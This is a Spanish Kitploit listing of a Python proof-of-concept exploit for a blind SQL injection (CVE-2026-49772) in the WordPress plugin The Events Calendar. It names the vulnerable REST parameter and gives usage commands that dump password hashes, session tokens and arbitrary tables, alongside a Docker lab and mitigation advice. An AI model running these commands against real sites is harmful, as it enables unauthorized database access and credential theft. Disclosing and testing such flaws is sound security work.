Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-49772 — Exploit de inyección SQL ciega para CVE-2026-49772 dirigido al plugin The Events Calendar de WordPress. Extrae el contenido de la base de datos mediante oráculo booleano/basado en tiempo con escaneo multihilo, volcado de hashes de usuario y soporte de consultas personalizadas. | Kitploit
Herramientas/GitHubGitHub/joshuavanderpoll/cve-2026-49772
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubjoshuavanderpoll/cve-2026-49772

CVE-2026-49772

Exploit de inyección SQL ciega para CVE-2026-49772 dirigido al plugin The Events Calendar de WordPress. Extrae el contenido de la base de datos mediante oráculo booleano/basado en tiempo con escaneo multihilo, volcado de hashes de usuario y soporte de consultas personalizadas.

Ver Repositorio
3hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto (PoC) de Inyección SQL en The Events Calendar (CVE-2026-49772)

Python

Descripción

CVE-2026-49772 es una inyección SQL ciega no autenticada en el plugin de WordPress The Events Calendar. Un validador de parámetros REST defectuoso (validate_callback devuelve un closure en lugar de validar) permite que el parámetro order en la API REST experimental tec/v1 llegue sin sanitizar a la cláusula SQL ORDER BY:

root@kitploit:~
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
root@kitploit:~
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...

Esta es una inyección de solo lectura (sin consultas apiladas, sin escrituras, sin salida directa) — pero toda la base de datos se puede extraer mediante un oráculo booleano/basado en tiempo: hashes de contraseñas de usuarios, tokens de sesión, contraseñas de aplicación, claves secretas.

Versiones afectadas: The Events Calendar 6.15.12 – 6.16.2 (corregido en 6.16.3) Gravedad: CVSS 3.1 9.3 Crítico — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Características

  • --check — Detección no intrusiva: espacio de nombres REST, versión del plugin, confirmación basada en tiempo
  • --recon — Huella de la BD: versión, usuario actual, base de datos, SO, privilegios, prefijo de tablas
  • --users — Volcar wp_users: inicios de sesión, correos electrónicos, hashes de contraseñas
  • --user-meta — Volcar wp_usermeta: tokens de sesión, contraseñas de aplicación, capacidades
  • --get-table — Volcar cualquier tabla con descubrimiento automático de columnas
  • --query — Extraer el resultado de cualquier SELECT escalar
  • Dos oráculos — booleano rápido (predeterminado) o basado en tiempo, multihilo; sin dependencias externas

Instalación

Biblioteca estándar de Python 3 puro — se incluye requirements.txt para el flujo de trabajo estándar pero no instala nada adicional.

OSX / Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help

Uso

root@kitploit:~
python3 CVE-2026-49772.py <target> <action> [options]

Seleccione exactamente una acción: --check, --recon, --users, --user-meta, --get-table <TABLE>, --query <SQL>. Ejecute --help para todas las opciones.


Verificación de vulnerabilidad

root@kitploit:~
python3 CVE-2026-49772.py target.tld --check

Reconocimiento de base de datos

root@kitploit:~
python3 CVE-2026-49772.py target.tld --recon

Volcar usuarios + hashes de contraseñas

root@kitploit:~
python3 CVE-2026-49772.py target.tld --users

Extraer un valor personalizado

root@kitploit:~
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"

Ajuste: --technique boolean|time, --delay, --threads, --rows, --prefix, --where, -useragent, -timeout. Escanee múltiples hosts con -l targets.txt.

PoC con Docker

Un laboratorio autocontenido con Docker Compose que incluye el plugin vulnerable (incluido, no descargado al iniciar) y eventos previamente sembrados. Consulte docker/DOCKER.md.

root@kitploit:~
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check

Mitigación

  • Actualice The Events Calendar a 6.16.3 o superior
  • Hasta que se aplique el parche, bloquee /wp-json/tec/v1/ en el WAF / proxy inverso

Referencias

  • The Events Calendar
  • CVE.org — CVE-2026-49772
  • NVD — CVE-2026-49772
  • Aviso de GitHub — GHSA-v796-wqfq-j4xh
  • Patchstack — Inyección SQL en The Events Calendar

Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de investigación. Úsela solo contra sistemas que posea o para los cuales tenga permiso explícito por escrito para realizar pruebas. El creador no asume ninguna responsabilidad por el mal uso o daño causado por esta herramienta.

Descargar herramienta